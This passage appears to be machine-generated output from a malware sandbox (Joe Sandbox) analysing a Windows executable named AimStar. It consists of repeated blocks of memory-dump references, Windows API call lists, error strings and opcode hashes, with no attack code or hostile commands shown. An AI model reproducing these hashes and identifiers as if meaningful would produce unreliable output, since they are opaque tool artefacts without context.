                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                                          • Instruction ID: ec8c900ca757510be56ef085bbb0fbb0c40bb3f20410fca852bcff1081ca1fb1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9218920E0CE0A42FA69B761565713DE16A4F487B0FC44234E93E46BD6DE2CB608C731
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                          • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                          • Instruction ID: 732320e3b8c495d97d97ede59262e3ee1c6437d447202657a45c83e13bf318aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7311842561CF4586E351AB52E85A329F3A8FB98BF4F400234E95D87794DF7CE848C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF710F49216), ref: 00007FF710F48592
                                                                                                                                                                                                                                          • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F485E9
                                                                                                                                                                                                                                            • Part of subcall function 00007FF710F49400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF710F445E4,00000000,00007FF710F41985), ref: 00007FF710F49439
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F48678
                                                                                                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F486E4
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F486F5
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,00000000,00007FF710F49216), ref: 00007FF710F4870A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3462794448-0
                                                                                                                                                                                                                                          • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                          • Instruction ID: 899c541852678944eeb4ddca8fe1334a2deef6c816ae896d4c09df081b2c4361
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2441B732B1DA8641E670AB11A552AAEA398FF44BE4F850035DF4D97789DF3CF50AC720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B347
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B37D
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3AA
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3BB
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3CC
                                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF710F54F81,?,?,?,?,00007FF710F5A4FA,?,?,?,?,00007FF710F571FF), ref: 00007FF710F5B3E7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                                                                                                          • Opcode ID: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                                          • Instruction ID: 7b2d6a4d612f110421e969019983c97df14bb56d209800f702c30a659077b510
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8f3e74ebbb6b3e9df47af100808aa7e96d944c008937dd2b032c21f4d9a902
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36118C20A0CE4A82FA54B721565713DE2AA5F487B0FC44334E82E567C6DE2CB60DC721
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF710F41B6A), ref: 00007FF710F4295E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                          • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                          • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                          • Instruction ID: af6b0c84cf4678254ca775d5ed28f62648ecb21beb9ffa9c9ff33da36e3e42b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F31B736B1CA8552E710B761A8426E6B298BF887E4F800131EE4D83755DF3CE54AC610
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                          • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                          • Instruction ID: 3f0175d0238b3dbc5c8a090f14237fe98c94a6ffbeae6feca79db69f4f1761d8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F731733661DE8189EB60EF21E8562F9A3A4FF89794F840135EA4D47B55DF3CE148C720
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF710F4918F,?,00007FF710F43C55), ref: 00007FF710F42BA0
                                                                                                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF710F42C2A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                          • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                          • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                          • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                          • Instruction ID: 172aa94df94bc69ce49b602b5742859e44903b844107bdb4e256ec977cf9f4b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3219F7270CF4182E650EB14B8467AAB3A8FB88794F804136EE8D97755DE3CE249C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF710F41B99), ref: 00007FF710F42760
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                                                                          • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                          • API String ID: 2050909247-1591803126
                                                                                                                                                                                                                                          • Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                          • Instruction ID: 3c69edb76c156c611ccee13237ee720f5e956f80c0562d24120d1e99a6fb098e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89217172A1CB8552E650AB50B8427E6A398BB88794F800131EE8C83759DF7CE289C750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                          • Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                          • Instruction ID: 72619413d11f2a896fe30922e25daf4f238b0360d91c34131b1b7604a7e68c2a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BF04425B0DE0691FA14AB14E4567759328EF85771F940235D56D463E4DF2CF28CC320
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _set_statfp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                                                                                                                          • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction ID: f4721a673b98db7797d5913a70fc1859a576ca3f134d3f79da407c4c856ce546
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1511917AE5CE1301FA54B124E4573F5A04CEF99374F848634EA7E063DACE2CB94AD224
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B41F
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B43E
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B466
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B477
                                                                                                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF710F5A613,?,?,00000000,00007FF710F5A8AE,?,?,?,?,?,00007FF710F5A83A), ref: 00007FF710F5B488
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                                          • Instruction ID: cb56a1f8abd9fb011eb0640d0143788b324f4ab81b2fa80e5d6d664f2249befb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cf0457813ef902b4d16e29671bd05b92734aec0d3ae5f0b4a86182189680110
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72116A20A0CE0641FA68FB215653179E16A5F847B0FD88334E93E467D7DE2CB649C721
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Value
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3702945584-0
                                                                                                                                                                                                                                          • Opcode ID: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                                          • Instruction ID: a465283edfeb73a356b6bfc112ddec59a253b4987a0840e85d6d0cb3dee9598d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58ce09dd5263def6ec13d4cefdd98fc26a3f0444d111e578bd11d526dfe727f7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85110620A0CA0A41F959B721441717991694F49370FC84774E93E5A3C3DD2CB60DC732
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: verbose
                                                                                                                                                                                                                                          • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                          • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                          • Instruction ID: cf552a08f4a76e8837201d6e5e0f8f94e690cbd1a24550d90857e6695f15bee9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8391CF32A0CE4641FB60AE25E45237DB2B9AB49BA4FC44136DA69433D5DF3CF649C321
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2428725244.00007FF710F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF710F40000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428693173.00007FF710F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428827860.00007FF710F6B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428862280.00007FF710F82000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2428925861.00007FF710F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff710f40000_AimStar.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                          • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                          • Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
